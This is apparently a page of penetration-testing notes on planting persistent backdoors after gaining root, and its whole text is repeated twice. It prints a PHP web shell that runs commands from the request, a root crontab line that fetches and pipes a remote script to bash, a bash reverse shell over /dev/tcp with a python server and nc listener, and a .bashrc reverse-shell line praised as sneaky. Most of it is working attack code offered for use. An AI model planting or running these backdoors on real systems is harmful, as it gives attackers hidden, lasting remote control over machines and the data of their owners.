injecting Backdoors

If you got root and you want to set up a backdoor for later use.

PHP Backdoor

create a file shell.php && place it under /var/www/html 
------------------------------------------
<?php
    if (isset($_REQUEST['cmd'])) {
        echo "<pre>" . shell_exec($_REQUEST['cmd']) . "</pre>";
    }
?>
------------------------------------------
 access it directly using : http://ip/shell.php

Cronjob Backdoor

it is not hidden but it is useful.

cat /etc/crontab
echo '* *     * * *   root    curl http://<yourip>:8080/shell | bash' >> /etc/crontab


Now on kali :
make a file 'shell' with contents :
------------------------------------------
#!/bin/bash

bash -i >& /dev/tcp/ip/port 0>&1
------------------------------------------
and run --> python3 -m http.server 8080
as well as --> nc -nvlp <port>

.bashrc Backdoor

If the user is using bash as their login shell the ".bashrc" file in their home directory is executed when an interactive session is launched.


>>> echo 'bash -i >& /dev/tcp/ip/port 0>&1' >> ~/.bashrc


'''
One important thing is to always have your nc listener ready as you don't know when your user will log on.
This attack is very sneaky as nobody really thinks about ever checking their ".bashrc" file.
On the other hand, you can't exactly know if any of the user's will actually login to their system, so you might really wait a long period of time.
'''

PreviousPost Exploitation NextMachines

Last updated 2 years ago

injecting Backdoors

If you got root and you want to set up a backdoor for later use.

PHP Backdoor

create a file shell.php && place it under /var/www/html 
------------------------------------------
<?php
    if (isset($_REQUEST['cmd'])) {
        echo "<pre>" . shell_exec($_REQUEST['cmd']) . "</pre>";
    }
?>
------------------------------------------
 access it directly using : http://ip/shell.php

Cronjob Backdoor

it is not hidden but it is useful.

cat /etc/crontab
echo '* *     * * *   root    curl http://<yourip>:8080/shell | bash' >> /etc/crontab


Now on kali :
make a file 'shell' with contents :
------------------------------------------
#!/bin/bash

bash -i >& /dev/tcp/ip/port 0>&1
------------------------------------------
and run --> python3 -m http.server 8080
as well as --> nc -nvlp <port>

.bashrc Backdoor

If the user is using bash as their login shell the ".bashrc" file in their home directory is executed when an interactive session is launched.


>>> echo 'bash -i >& /dev/tcp/ip/port 0>&1' >> ~/.bashrc


'''
One important thing is to always have your nc listener ready as you don't know when your user will log on.
This attack is very sneaky as nobody really thinks about ever checking their ".bashrc" file.
On the other hand, you can't exactly know if any of the user's will actually login to their system, so you might really wait a long period of time.
'''

PreviousPost Exploitation NextMachines

Last updated 2 years ago